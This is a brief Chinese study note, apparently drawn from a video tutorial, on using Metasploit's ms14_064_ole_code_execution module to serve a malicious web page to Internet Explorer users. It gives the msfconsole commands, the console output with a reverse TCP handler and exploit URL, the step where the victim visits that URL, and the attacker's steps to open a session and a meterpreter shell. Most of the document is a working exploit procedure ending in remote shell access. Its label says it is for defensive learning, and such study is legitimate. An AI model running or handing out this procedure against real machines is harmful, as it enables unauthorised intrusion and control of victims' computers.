【笔记】msf生成网站木马

前言

msf生成网站木马

本文仅用于网络信息防御学习

生成网站木马

set target 0：设置目标为WindowsXP
set target 1：设置目标为Windows7

msfconsole
msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
msf6 exploit(exploit/windows/browser/ms14_064_ole_code_execution) > set allowpowerpromt true
msf6 exploit(exploit/windows/browser/ms14_064_ole_code_execution) > set target 1
msf6 exploit(exploit/windows/browser/ms14_064_ole_code_execution) > exploit

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.1:4444
[*] Using URL: http://0.0.0.0:8080/XxXxXxXx
[*] Local IP: http://192.168.0.1:8080/XxXxXxXx
[*] Server started.

木马利用

受害者

• 通过IE浏览器访问http://192.168.0.1:8080/XxXxXxXx

攻击者

• 上线后查看Session

msf6 exploit(exploit/windows/browser/ms14_064_ole_code_execution) > sessions

• 根据SessionID进行连接

msf6 exploit(exploit/windows/browser/ms14_064_ole_code_execution) > sessions 2
meterpreter > shell

完成

参考文献

哔哩哔哩——xiaodisec